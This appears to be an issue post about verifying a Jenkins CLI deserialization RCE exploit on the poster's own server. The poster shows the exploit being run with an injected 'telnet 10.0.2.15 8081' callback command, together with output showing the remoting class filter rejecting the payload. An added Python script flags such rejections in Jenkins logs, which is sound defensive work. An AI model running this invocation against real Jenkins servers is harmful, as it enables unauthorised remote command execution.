java-deserialization-exploits
jenkins-cli exploit verification
I have Jenkins 2.47 with nginx. I'm trying to verify the exploit using the jenkins_cli_rmi_rce.
I'm expecting to see the tcpdump output below to show the telnet attempting to connect on port 8081 (verified this by running this telnet cmd directly on appserver).
Don't think the exploit is working on my setup but I may be missing something obvious.
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 'telnet 10.0.2.15 8081'
[] Target IP: localhost
[] Target PORT: 8080
[] Retrieving the Jenkins CLI port
[] Connecting to Jenkins CLI on localhost:38539
[] Sending headers
Jan 26, 2017 6:47:48 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #15 from /127.0.0.1:41626
[] Received "Welcome "
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
Nothing on tcpdump
root@appserver:~# tcpdump port 8081 -i any
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes
The Jenkins log shows the following output -
Jan 26, 2017 6:47:48 PM hudson.init.impl.InstallUncaughtExceptionHandler$DefaultUncaughtExceptionHandler uncaughtException
SEVERE: A thread (TCP agent connection handler #15 with /127.0.0.1:41626/88) died unexpectedly due to an uncaught exception, this may leave your Jenkins in a bad way and is usually indicative of a bug in the code.
java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler
    at hudson.remoting.Capability$1.resolveClass(Capability.java:137)
    at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1817)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1711)
    at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1982)
    at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1533)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:420)
    at hudson.remoting.Capability.read(Capability.java:140)
    at hudson.remoting.ChannelBuilder.negotiate(ChannelBuilder.java:391)
    at hudson.remoting.ChannelBuilder.b[+] Sent payload uild(ChannelBuilder.java:310)
    at hudson.cli.CliProtocol$Handler.runCli(CliProtocol.java:95)
    at hudson.cli.CliProtocol$Handler.run(CliProtocol.java:82)
    at hudson.cli.CliProtocol.handle(CliProtocol.java:58)
    at hudson.TcpSlaveAgentListener$ConnectionHandler.run(TcpSlaveAgentListener.java:230)
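
The `SecurityException: Rejected: ...` entry raised from `Capability$1.resolveClass` in the log above is the remoting class filter refusing a class during deserialization. As an added example (not part of the original post or of the exploit repository), this Python script flags such rejections in a Jenkins log and ties each one to the peer that opened the connection; `find_rejections` and the record fields are hypothetical names, and the sample lines are taken from the post with the stack trace abridged.

```python
import re

# Lines from the log in the post above, one event per line (stack trace abridged).
SAMPLE_LOG = """\
INFO: Accepted connection #15 from /127.0.0.1:41626
SEVERE: A thread (TCP agent connection handler #15 with /127.0.0.1:41626/88) died unexpectedly due to an uncaught exception
java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler
    at hudson.remoting.Capability$1.resolveClass(Capability.java:137)
    at hudson.remoting.Capability.read(Capability.java:140)
    at hudson.remoting.ChannelBuilder.b[+] Sent payload uild(ChannelBuilder.java:310)
    at hudson.cli.CliProtocol$Handler.runCli(CliProtocol.java:95)
"""

ACCEPT = re.compile(r"Accepted connection #(\d+) from /([\d.]+):(\d+)")
DIED = re.compile(r"TCP agent connection handler #(\d+) with /")
REJECT = re.compile(r"java\.lang\.SecurityException: Rejected: ([\w.$]+)")
FRAME = re.compile(r"^\s*at ([\w.$]+)\(")

def find_rejections(log_text):
    """Return one record per class rejected during deserialization (hypothetical helper)."""
    peers = {}    # connection id -> (ip, port), from "Accepted connection" lines
    conn = None   # id named by the most recent "handler #N ... died" line
    findings, current = [], None
    for line in log_text.splitlines():
        if m := ACCEPT.search(line):
            peers[m.group(1)] = (m.group(2), int(m.group(3)))
        elif m := DIED.search(line):
            conn, current = m.group(1), None
        elif m := REJECT.search(line):
            ip, port = peers.get(conn, (None, None))
            current = {"class": m.group(1), "conn": conn,
                       "peer_ip": ip, "peer_port": port, "frames": []}
            findings.append(current)
            conn = None
        elif current is not None and (m := FRAME.match(line)):
            # Frames garbled by interleaved console output do not match and are skipped.
            current["frames"].append(m.group(1))
    for f in findings:
        # A hudson.cli frame means the object arrived over the CLI remoting channel.
        f["via_cli"] = any(fr.startswith("hudson.cli.") for fr in f["frames"])
    return findings

if __name__ == "__main__":
    for finding in find_rejections(SAMPLE_LOG):
        print(finding)
```
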